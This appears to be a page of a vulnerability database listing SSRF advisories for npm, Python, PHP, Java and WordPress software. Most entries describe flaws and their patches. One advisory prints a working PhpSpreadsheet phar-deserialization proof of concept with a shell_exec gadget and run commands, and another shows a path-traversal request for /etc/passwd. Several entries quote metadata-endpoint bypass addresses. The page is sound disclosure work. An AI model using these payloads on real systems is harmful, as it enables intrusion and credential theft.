Server-Side Request Forgery (SSRF) in link-preview-js npm package allows attackers to craft URLs that bypass validation to access internal network resources via IPv6 loopback addresses (::1, ::ffff:127.0.0.1) and DNS rebinding attacks using wildcard services (.internal, .local, .nip.io, .sslip.io domains). Successful exploitation enables reading internal metadata endpoints, accessing private network services, and exfiltrating sensitive data from cloud instance metadata or internal APIs. Vendor-released patch in version 4.0.1 tightens regex validation but requires users to implement DNS resolution via resolveDNSHost option for complete protection. No public exploit identified at time of analysis, though the attack techniques are well-documented SSRF methods.

SSRF
NVD GitHub
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

DNS rebinding in Admidio's SSO metadata fetch endpoint bypasses SSRF protections by validating a hostname's IP address with gethostbyname() but passing the original hostname to curl_init(), allowing attackers to redirect requests to internal services including cloud metadata endpoints. Authenticated administrators can exploit this TOCTOU window between DNS resolution check and cURL connection to access internal IP ranges, read instance metadata, or scan internal networks.

Python SSRF PHP
NVD GitHub
EPSS 0% CVSS 2.4
LOW PATCH Monitor

Server-side request forgery (SSRF) in Geyser through version 2.9.2 allows authenticated attackers with operator privileges to cause the Minecraft server to issue arbitrary HTTP GET requests to internal or attacker-controlled endpoints via crafted Base64-encoded player head texture URLs in the /give command. The vulnerability enables blind SSRF attacks for network reconnaissance, cloud metadata probing, and server IP disclosure without requiring unauthenticated access. Publicly available exploit code exists demonstrating proof-of-concept via webhook.site.

SSRF Java
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Server-side request forgery in requests-hardened prior to 1.2.1 allows remote attackers to bypass SSRF protection and access internal services within RFC 6598 Shared Address Space (100.64.0.0/10) by supplying arbitrary URLs, particularly impacting AWS EKS deployments where this CIDR is the default pod network. The vulnerability has a CVSS score of 6.5 and is environment-dependent, affecting only deployments using the vulnerable IP range for internal networking. Vendor-released patch: version 1.2.1 extends IP filtering logic to block RFC 6598, 6to4 relay anycast, IPv6 reserved ranges, and multicast addresses.

Python SSRF
NVD GitHub
EPSS 0% CVSS 8.3
HIGH This Week

Server-side request forgery (SSRF) in Twenty CRM allows authenticated users to bypass IP filtering protections and access internal network resources, including cloud metadata endpoints containing IAM credentials. The vulnerability affects versions 1.18.0 and earlier through exploitation of IPv4-mapped IPv6 address normalization inconsistencies in Node.js URL parsing versus the isPrivateIp validation utility. Attackers with low-privilege authenticated access can exfiltrate sensitive credentials from cloud provider metadata services (169.254.169.254). No public exploit code or active exploitation (CISA KEV) confirmed at time of analysis, though the technical details in the GitHub security advisory provide a clear exploitation path.

SSRF Node.js
NVD GitHub VulDB
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Server-side request forgery combined with missing authentication in firefighter-incident Python package allows unauthenticated remote attackers to exfiltrate AWS IAM credentials from cloud metadata endpoints. The `/api/v2/firefighter/raid/jira_bot` endpoint accepts arbitrary URLs in the `attachments` parameter, fetches them server-side without validation, and uploads responses as Jira attachments — enabling SSRF against internal services including `http://169.254.169.254/` (AWS EC2 Instance Metadata Service). Vendor-released patch (version 0.0.54) enforces authentication and validates attachment URLs to block private/link-local/loopback addresses. No public exploit identified at time of analysis, but exploitation is trivial given detailed advisory with exact vulnerable code paths.

Authentication Bypass SSRF Atlassian
NVD GitHub
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Server-Side Request Forgery in edx-enterprise 7.0.2-7.0.4 enables Enterprise Admins to steal cloud credentials and scan internal networks. Authenticated users with the Enterprise Admin role-typically delegated to training managers, not platform operators-can inject arbitrary URLs into SAMLProviderConfig.metadata_source and trigger server-side HTTP requests to internal infrastructure. Publicly available exploit code exists (proof-of-concept in GitHub advisory GHSA-64cv-vxpr-j6vc). Vendor-released patch: edx-enterprise 7.0.5. This mirrors a previously patched SSRF in openedx-platform (GHSA-328g-7h4g-r2m9), indicating recurring pattern in SAML metadata handling across Open edX components.

Python SSRF Microsoft
NVD GitHub
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in Eclipse BaSyx Java Server SDK prior to 2.0.0-milestone-10 allows unauthenticated remote attackers to force the server to execute blind HTTP POST requests to arbitrary internal or external targets via the unvalidated Operation Delegation feature. Attackers can exploit this to bypass network segmentation, pivot into isolated IT/OT infrastructure, or access Cloud Metadata services (IMDS) - enabling potential credential theft and lateral movement. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis, but the SSRF attack pattern is well-understood and readily exploitable.

SSRF Java
NVD
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Server-side request forgery policy bypass in OpenClaw npm package (versions < 2026.4.10) allows authenticated remote attackers to interact with or navigate to unauthorized targets through existing-session browser interaction routes. The vulnerability bypasses SSRF navigation guards in routes handling click, type, press, and evaluate actions, enabling cross-scope information disclosure. Vendor-released patch available in version 2026.4.10. No public exploit identified at time of analysis, though EPSS data not available. Reported by security researchers from KeenSecurityLab with detailed technical disclosure.

Authentication Bypass SSRF Openclaw
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Server-side request forgery in OpenClaw npm package before 2026.4.14 allows authenticated remote attackers to access internal services and cloud metadata endpoints through browser-driven requests. The vulnerability stems from a misconfigured browser SSRF policy that permits private-network navigation by default, enabling cross-scope information disclosure without user interaction. Patch available in version 2026.4.14 with vendor advisory and multiple fix commits confirmed. No public exploit or CISA KEV listing identified at time of analysis, though CVSS 7.7 reflects high confidentiality impact with changed scope.

SSRF Openclaw
NVD GitHub VulDB
EPSS 0% CVSS 8.3
HIGH PATCH This Week

Server-side request forgery in OpenClaw's QQBot media URL handler allows remote unauthenticated attackers to fetch arbitrary internal or external resources and exfiltrate them through the bot's messaging channel. Attackers provide malicious media URLs in QQBot replies, triggering the server to fetch content from attacker-specified locations, which is then re-uploaded through legitimate channels. Vendor patch available as of version 2026.4.12, with fix commits published on GitHub. CVSS 8.3 reflects high confidentiality impact with low integrity impact; CVSS v4.0 vector indicates network-accessible, low complexity attack requiring no privileges or user interaction but specific attack conditions (AT:P).

SSRF Openclaw
NVD GitHub VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Server-side request forgery (SSRF) policy bypass in OpenClaw npm package allows authenticated remote attackers to perform unauthorized browser tab navigation operations, circumventing configured SSRF protections through the /tabs/action endpoint. OpenClaw versions before 2026.4.10 are affected. Vendor-released patch version 2026.4.10 is available (confirmed by GitHub advisory GHSA-rj2p-j66c-mgqh and commit 48c0347). No public exploit identified at time of analysis, though EPSS data not available. The CVSS score of 8.5 with scope change (S:C) indicates potential for significant cross-boundary impact despite requiring low-privilege authentication.

Authentication Bypass SSRF Openclaw
NVD GitHub VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Authenticated users of OpenClaw (npm package) can bypass server-side request forgery (SSRF) protections to access internal or restricted web pages via browser snapshot, screenshot, and tab routes. The vulnerability exploits incomplete validation after route-driven navigation - while initial requests pass SSRF policy checks, the final browser target after navigation is not re-validated before content is captured and returned. This allows lateral movement to internal endpoints (e.g., cloud metadata services at 169.254.169.254) in environments with restrictive browser SSRF configurations. Vendor-released patch available in OpenClaw 2026.4.14. No active exploitation confirmed (not in CISA KEV), though public exploit code has not been independently verified.

Authentication Bypass SSRF Openclaw
NVD GitHub VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Server-Side Request Forgery in Gutenverse - Ultimate WordPress FSE Blocks Addons & Ecosystem plugin versions up to 3.5.3 allows authenticated contributors and above to initiate arbitrary web requests from the vulnerable server via the import_images() function, enabling query and modification of internal services. The vulnerability is exploitable without user interaction over the network, affecting sites with contributor-level users or higher.

SSRF WordPress
NVD VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Prototype pollution read-side gadgets in the axios HTTP adapter (npm, versions >=1.0.0 to <1.15.2) allow an attacker who has already polluted Object.prototype in the same Node.js process to hijack every outbound request - injecting attacker-controlled Authorization headers, redirecting relative-URL requests to an external server, pointing requests at internal Unix sockets (SSRF/container escape), forcing Node's insecure HTTP parser, and even executing an attacker-supplied beforeRedirect callback. The flaw stems from five config properties (auth, baseURL, socketPath, beforeRedirect, insecureHTTPParser) being read via direct property access that traverses the prototype chain, unlike eight sibling properties already guarded by an own() helper. A working proof-of-concept is published in the GHSA advisory, but EPSS is only 0.03% and the issue is not in CISA KEV - no public exploit identified at time of analysis as a standalone attack, and it requires a separate prototype pollution primitive to fire.

SSRF RCE Prototype Pollution +2
NVD GitHub VulDB
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Non-admin users holding the SETTINGS permission in pyload-ng can disable TLS peer and hostname verification by setting general.ssl_verify=off via the set_config_value() API, enabling man-in-the-middle attacks on all outbound HTTPS requests including downloads, captcha fetches, and plugin calls. This is an incomplete fix for a series of prior allowlist bypasses (CVE-2026-33509, CVE-2026-35463, CVE-2026-35464, CVE-2026-35586) in which security-sensitive configuration options were omitted from the ADMIN_ONLY_CORE_OPTIONS allowlist.

Python SSRF Privilege Escalation
NVD GitHub VulDB
EPSS 0% CVSS 4.4
MEDIUM PATCH This Month

Server-Side Request Forgery (SSRF) in PlantUML Macro for XWiki prior to version 2.4.1 allows authenticated users with UI interaction to specify arbitrary PlantUML servers via the server parameter without validation. An attacker can redirect the XWiki server to connect to internal IP addresses or malicious external URLs, enabling reconnaissance of internal infrastructure or attacks on internal services. The vulnerability requires authenticated access and user interaction but operates across scope boundaries (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C). Vendor-released patch available in version 2.4.1.

SSRF Macro Plantuml
NVD GitHub VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

XML External Entity injection in Apache OpenNLP's DictionaryEntryPersistor allows remote unauthenticated attackers to disclose local files or perform server-side request forgery when processing untrusted dictionary files. The vulnerable SAX parser initialization omits critical security features (FEATURE_SECURE_PROCESSING, DTD disablement) present elsewhere in the codebase, creating an inconsistency exploitable via the public Dictionary(InputStream) API when loading stop-word lists or domain dictionaries. With EPSS at 0.03% (8th percentile) and no active exploitation reported, this represents a code-quality issue in a specific input path rather than an imminent widespread threat, though the CVSS 9.1 reflects maximum theoretical impact given the network-accessible, unauthenticated attack vector.

XXE SSRF Apache +1
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Blind server-side request forgery in Incus allows authenticated users to trigger arbitrary HEAD requests to internal or external endpoints during image import preflight validation, bypassing the restricted.images.servers project restriction. While the actual image download is blocked by project policies, the preflight HEAD request executes before validation occurs, enabling attackers to probe internal services, cloud metadata endpoints, or unroutable address space reachable from the Incus host. No public exploit code identified at time of analysis, though proof-of-concept reproduction is documented in the advisory.

Debian SSRF Suse
NVD GitHub VulDB
EPSS 0% CVSS 2.1
LOW POC PATCH Monitor

Server-side request forgery (SSRF) in pixelsock directus-mcp 1.0.0 allows authenticated remote attackers to manipulate the fileUrl argument in the validateUrl function, enabling requests to internal resources including cloud metadata services and private networks. Publicly available exploit code exists and a patch awaiting acceptance is available on GitHub. CVSS 6.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L) reflects moderate impact with authentication requirement.

SSRF Directus Mcp
NVD VulDB GitHub
EPSS 0% CVSS 7.2
HIGH This Week

Server-Side Request Forgery (SSRF) in Royal Elementor Addons plugin for WordPress allows authenticated attackers with Contributor-level permissions to bypass URL validation by including 'docs.google.com/spreadsheets' in query parameters, enabling requests to arbitrary internal URLs and retrieval of sensitive data from private network services. Affects versions up to 1.7.1057. The CVSS vector indicates network-based attack with no authentication required (PR:N), contradicting the description's statement of Contributor-level requirement-affected site operators should verify actual privilege requirements with vendor advisory. No active exploitation confirmed (not in CISA KEV), but detailed source code references enable rapid POC development.

SSRF Google WordPress +1
NVD VulDB
EPSS 0% CVSS 2.1
LOW POC PATCH Monitor

Server-side request forgery in JeecgBoot up to 3.9.1 allows authenticated remote attackers to manipulate the CommonController.uploadImgByHttp endpoint and trigger arbitrary HTTP requests from the server, with publicly available exploit code and vendor confirmation of the issue. The vulnerability affects the image upload functionality through HttpFileToMultipartFileUtil.httpFileToMultipartFile and downloadImageData methods, enabling attackers with valid credentials to abuse the application as a proxy for outbound requests.

Java SSRF
NVD VulDB GitHub
EPSS 0% CVSS 7.2
HIGH This Week

Server-Side Request Forgery in PixelYourSite Pro WordPress plugin allows unauthenticated remote attackers to force the web application to make arbitrary HTTP requests to internal or external resources through the vulnerable scan_video function. The vulnerability affects all versions up to 12.5.0.1 and features a Changed scope (CVSS S:C), enabling attackers to probe internal network infrastructure, access cloud metadata services, and potentially modify data in internal systems that trust requests from the WordPress server. The blind SSRF nature means attackers receive no direct response but can infer results through timing attacks or side-channel observation. EPSS data not available; no public exploit code identified at time of analysis.

SSRF WordPress
NVD VulDB
EPSS 0% CVSS 4.4
MEDIUM This Month

Server-Side Request Forgery in the Ona WordPress theme versions up to 1.26 via the ona_activate_child_theme function allows authenticated administrators to make arbitrary web requests originating from the affected server, enabling query and modification of internal services. The vulnerability requires administrator-level privileges and high attack complexity, limiting real-world exploitation to compromised or malicious admin accounts. No public exploit code or active exploitation has been identified.

SSRF WordPress
NVD VulDB
EPSS 0% CVSS 2.1
LOW Monitor

Server-side request forgery in JeecgBoot up to version 3.9.1 allows authenticated remote attackers to manipulate the originUrl parameter in OpenApiController.add and OpenApiController.call methods, enabling arbitrary HTTP requests from the affected server. The vulnerability requires low-level authentication privileges and carries minimal direct impact (CVSS 2.1), but public exploit code exists and vendors confirmed the issue with a fix planned for an upcoming release.

Java SSRF
NVD GitHub VulDB
EPSS 0% CVSS 2.1
LOW Monitor

Server-side request forgery in JeecgBoot up to version 3.9.1 affects the checkPathTraversalBatch function in FileDownloadUtils.java within the LoadFile endpoint. Authenticated remote attackers can manipulate the files argument to trigger SSRF, allowing them to make unauthorized requests to internal or external resources. Publicly disclosed exploit code exists, and the vendor has confirmed the issue with a fix promised in an upcoming release.

SSRF
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Server-Side Request Forgery (SSRF) in Apache Neethi allows remote attackers to make arbitrary outbound requests to internal IP addresses and non-HTTP/HTTPS protocols when an application explicitly calls the PolicyReference API to retrieve remote policies. The vulnerability affects all versions before 3.2.2, which restricts URI schemes to HTTP/HTTPS and blocks link-local, multicast, and any-local addresses. No active exploitation has been confirmed at this time.

SSRF Apache Red Hat
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Server-side request forgery (SSRF) in IBM Langflow Desktop 1.0.0 through 1.8.4 permits unauthenticated remote attackers to send arbitrary HTTP requests from the vulnerable system, enabling network enumeration, internal service probing, and facilitation of secondary attacks against backend infrastructure. CVSS 6.5 reflects moderate confidentiality and integrity impact without authentication barriers despite PR:N in vector.

SSRF IBM
NVD VulDB
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in n8n-mcp SDK allows authenticated remote attackers to access cloud metadata endpoints and internal network resources via IPv4-mapped IPv6 address bypass. Versions 2.47.4 through 2.47.13 fail to validate IPv6 addresses in the synchronous URL validator (SSRFProtection.validateUrlSync()), enabling attackers who control the n8nApiUrl parameter to bypass RFC1918, localhost, and cloud metadata protections using addresses like [::ffff:169.254.169.254]. The vulnerability is non-blind SSRF returning response bodies to the attacker, and forwards the n8nApiKey in the x-n8n-api-key header to attacker-controlled targets. Confirmed actively exploited (CISA KEV). Vendor-released patch: version 2.47.14. EPSS exploitation probability not provided but risk is elevated given KEV status and availability of exploit code in the GitHub advisory.

SSRF Microsoft Oracle +2
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

Server-Side Request Forgery in Gotenberg 8.29.1 Docker image enables remote unauthenticated attackers to probe internal networks and trigger POST requests to arbitrary internal/external endpoints via the Gotenberg-Webhook-Url header. CVSS 8.6 High with Changed Scope (S:C) reflects the ability to pivot from the Gotenberg container to internal services. Publicly available exploit code exists (PoC published in GitHub advisory GHSA-5vh4-rgv7-p9g4). Vendor-released patch 8.31.0 implements IP resolution and non-public address blocking to prevent DNS rebinding and RFC1918/link-local targeting.

Google SSRF Docker
NVD GitHub VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Gotenberg versions up to 8.30.1 allow Server-Side Request Forgery (SSRF) against internal networks and cloud metadata endpoints via case-variation bypass of webhook and downloadFrom deny-lists. Remote unauthenticated attackers can use uppercase URL schemes (HTTP://, HTTPS://) to circumvent the default case-sensitive regex (^https?://) protecting private IP ranges; Go's net/url.Parse() normalizes schemes to lowercase during connection establishment, completing the bypass. The flaw affects two features added in commit 3f01ca1 (April 2026): webhook callback URLs and downloadFrom file fetching. Vendor-released patch version 8.31.0 available. CVSS 9.1 (Critical) with Changed Scope reflects potential access to instance metadata services (e.g., AWS 169.254.169.254) and internal APIs that return sensitive data in Content-Disposition headers. This is a regression of the pattern previously fixed in CVE-2026-27018 for the Chromium deny-list.

Google SSRF Docker
NVD GitHub VulDB
EPSS 0% CVSS 5.0
MEDIUM This Month

Server-side request forgery in SpringBlade v4.8.0 allows authenticated network attackers to scan internal resources by sending crafted GET requests to the /ureport/datasource/testConnection endpoint, enabling reconnaissance of non-routable or restricted-access network segments. The vulnerability affects confidentiality but requires valid authentication credentials to exploit.

SSRF
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM This Month

Server-side request forgery in Halo v2.22.14 /themes/-/install-from-uri endpoint allows authenticated attackers to scan internal resources and access sensitive network information via crafted GET requests. The vulnerability requires valid authentication credentials but operates with low attack complexity and results in confidentiality impact through information disclosure of internal network topology and services.

SSRF N A
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM This Month

Server-side request forgery (SSRF) in Halo v2.22.14's /themes/{name}/upgrade-from-uri endpoint allows authenticated attackers to scan internal network resources and services by submitting crafted GET requests, enabling reconnaissance of backend infrastructure without direct network access.

SSRF N A
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM This Month

Server-Side Request Forgery (SSRF) in Halo v2.22.14's /plugins/{name}/upgrade-from-uri endpoint permits authenticated attackers to scan internal network resources and retrieve sensitive data via crafted GET requests, potentially enabling reconnaissance of internal infrastructure. The vulnerability requires valid authentication credentials but operates with low attack complexity, affecting the confidentiality of internal resources without requiring user interaction or administrative privileges.

SSRF N A
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM This Month

Server-Side Request Forgery (SSRF) in Halo v2.22.14's /plugins/-/install-from-uri endpoint enables authenticated attackers to scan internal resources and potentially access sensitive information via crafted GET requests. The vulnerability requires valid authentication credentials but operates with low attack complexity over the network, exposing internal network topology and services to enumeration attacks.

SSRF N A
NVD GitHub
EPSS 0% CVSS 8.2
HIGH PATCH This Week

### Summary Versions of `i18next-http-middleware` prior to 3.9.3 pass the user-controlled `lng` and `ns` values from `getResourcesHandler` directly into `i18next.services.backendConnector.load(languages, namespaces, …)` without any sanitisation. Depending on which backend is configured, the unvalidated path segments enable one of two attacks: - **Filesystem path traversal** when the middleware is paired with `i18next-fs-backend` (or any backend that interpolates `lng` / `ns` into a filesystem path). - **Server-Side Request Forgery (SSRF)** when the middleware is paired with `i18next-http-backend` (or any backend that interpolates into an HTTP URL). Example request: ``` GET /locales/resources.json?lng=../../etc/passwd&ns=root ``` with `i18next-fs-backend` reads the attacker-chosen file from disk; with `i18next-http-backend` reshapes the outgoing URL to target an internal service. ### Impact - **Arbitrary file read** via `fs`-style backends - any file the Node process can read becomes reachable (source, configuration, `.ssh` keys, `.env`, Docker secrets, etc.). - **SSRF** via `http`-style backends - requests to internal IPs / hostnames not normally reachable from the internet; combined with cloud metadata endpoints this can escalate to credential theft. - **Unbounded growth of `i18next.options.ns`** - a now-incidental amplification: the pre-patch `getResourcesHandler` pushed every unique `ns` value into the shared `i18next.options.ns` singleton array without validation or bounds, enabling memory exhaustion from repeated unique payloads. The severity is bounded by the backend in place, but the middleware itself exposed the unsanitised path; this is the "weakest link" layer. ### Affected versions `< 3.9.3`. ### Patch Fixed in **3.9.3**. The patch introduces `utils.isSafeIdentifier` and applies it in `getResourcesHandler` before `lng` and `ns` reach the backend connector: ```js languages = languages.filter(utils.isSafeIdentifier) namespaces = namespaces.filter(utils.isSafeIdentifier) ``` `isSafeIdentifier` uses a denylist approach - it still accepts any legitimate i18next language-code shape ([i18next FAQ](https://www.i18next.com/how-to/faq#how-should-the-language-codes-be-formatted)) - rejecting: - `..` sequences (relative path traversal) - path separators (`/`, `\`) - control characters (C0/C1) - prototype keys (`__proto__` / `constructor` / `prototype`) - empty strings and values longer than 128 characters Unsafe values are dropped; only safe values reach the backend. The fix is a defence-in-depth layer on top of any sanitisation the backend itself may apply. ### Workarounds No workaround short of upgrading. Front-proxying the middleware with a WAF rule that rejects requests containing `..`, `/`, `\`, or URL-structure characters in `lng` / `ns` is a partial mitigation. Upgrading the configured backend (`i18next-fs-backend` ≥ 2.6.4, `i18next-http-backend` ≥ 3.0.5) also closes the same attack at the next layer. ### Related advisories fixed in the same release - [GHSA-5fgg-jcpf-8jjw](https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw) - prototype pollution via `setPath` and `missingKeyHandler`. Independently fixable, filed separately per CNA rules. - [GHSA-c3h8-g69v-pjrg](https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-c3h8-g69v-pjrg) - HTTP response splitting + XSS-filter bypass (CVE-2026-41683). ### Credits Discovered via an internal security audit of the i18next ecosystem. ### Resources - [CWE-22: Path Traversal](https://cwe.mitre.org/data/definitions/22.html) - [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html) (specific sub-case when paired with an HTTP backend) - [i18next FAQ: language code formatting](https://www.i18next.com/how-to/faq#how-should-the-language-codes-be-formatted)

Docker SSRF Path Traversal +1
NVD GitHub
EPSS 0% CVSS 8.6
HIGH PATCH This Week

### Impact OGC API - Process execution requests can use the `subscriber` object to requests to internal HTTP services. ### Patches The issue has been patched in master branch and made available as part of the 0.23.3 release. The patch disables any HTTP requests made to internal resources by default (unless explicitly defined in configuration by a new `allow_internal_requests` directive. The commit/fix can be found in [3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef](https://github.com/geopython/pygeoapi/commit/3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef). ### Workarounds Users can update existing applications by disabling process based resources in their pygeoapi config, until 0.23.3 can be installed and deployed.

SSRF
NVD GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

A vulnerability was found in Algovate xhs-mcp 0.8.11. This affects the function xhs_publish_content of the file src/server/mcp.server.ts of the component MCP Interface. Performing a manipulation of the argument media_paths results in server-side request forgery. The attack may be initiated remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.

SSRF Xhs Mcp
NVD VulDB GitHub
EPSS 0% CVSS 9.2
CRITICAL PATCH Act Now

The usage of `is_file`, used to verify if the `$filename` is indeed an actual file, by all(?) `Reader` implementations (inside the helper function `File::assertFile`) is php-wrapper aware, for any [php wrappers](https://www.php.net/manual/en/wrappers.php) implementing `stat()`. The 3 wrappers `ftp://`, `phar://` and `ssh2.sftp://`, all satisfy this requirement - 2 of which are shown in the PoC below. This results in a SSRF, at "best", and RCE at worse. This was tested against the `latest` release - but the issue seems to go back a while from a first quick check (still present in `v1.30.2`). ## PoC To reproduce the vulnerable behavior, the following scripts were used: `php.ini` file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library: ```ini phar.readonly=0 ``` `make_phar.php` to create the malicious file: ```php <?php // php -c php.ini make_phar.php class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $pop = new GadgetClass('touch /tmp/poc.txt'); $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->addFromString('whatever', 'dummy content'); $phar->setMetadata($pop); $phar->stopBuffering(); rename('exploit.phar', 'exploit.xlsx'); // optional echo "exploit.xlsx created \n"; ``` `test.php` showcases the unsafe pattern: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $filename = $argv[1] ?? null; if (!$filename) { echo "Usage: php test.php <path>\n"; echo " e.g. php test.php phar://exploit.xlsx/whatever\n"; exit(1); } echo "Calling IOFactory::load('" . $filename . "')\n"; try { $spreadsheet = IOFactory::load($filename); var_dump($spreadsheet); } catch (Throwable $e) { echo "Vuln has still triggered even if exception triggers.\n"; } ``` ### RCE Run the PoC (for RCE): ```bash php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt ``` The file `/tmp/poc.txt` should now be present on disk. > Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. ### SSRF Run the PoC (for SSRF): ```bash ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test ``` Observe a connection is made to `127.0.0.1` on port `21`. ## Root Cause Analysis Following the API exposed by the library, using `IOFactory::load`, the code proceeds as follows: ```php IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename); ``` The one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios. ```php public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } } /** @param mixed[] $data */ public function __unserialize(array $data): void { $this->tempFileName = ''; throw new SpreadsheetException('Unserialize not permitted'); } ``` Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts. ## Suggested mitigations Use `is_file` only after making sure the filename does not contain any php wrapper: ```php $scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); } ``` or perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly: ```php $real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ... } ``` > Note: `stream_is_local()` would also not be safe here - as it considers `phar://` to be local and would not block it.

PHP Microsoft SSRF +1
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Server-Side Request Forgery (SSRF) vulnerability in ILLID Share This Image share-this-image allows Server Side Request Forgery.This issue affects Share This Image: from n/a through <= 2.14.

SSRF Share This Image
NVD
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Dell Disk Library for Mainframe, version(s) DLm 8700/2700 contain(s) a Server-Side Request Forgery (SSRF) vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.

SSRF Dell
NVD VulDB
EPSS 0% CVSS 2.1
LOW Monitor

A weakness has been identified in Xuxueli xxl-job up to 3.3.2. The affected element is the function triggerJob of the file xxl-job-admin/src/main/java/com/xxl/job/admin/service/impl/XxlJobServiceImpl.java of the component trigger Endpoint. This manipulation of the argument addressList causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. There is ongoing doubt regarding the real existence of this vulnerability. The project maintainer explains (translated from Chinese): "Triggers are manually activated and involve login and access control, thus requiring management." The pull request by the researcher got rejected because of that.

Java SSRF
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in Playwright redirect handling that allows attackers to bypass strict SSRF checks. Attackers can exploit request-time navigation to reach private targets that should be restricted by browser SSRF protections.

SSRF Openclaw
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist policies.

SSRF Openclaw
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access restricted resources.

SSRF Openclaw
NVD GitHub VulDB
Prev Page 6 of 32 Next

Quick Facts

Typical Severity
HIGH
Category
web
Total CVEs
2860

Related CWEs

MITRE ATT&CK

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy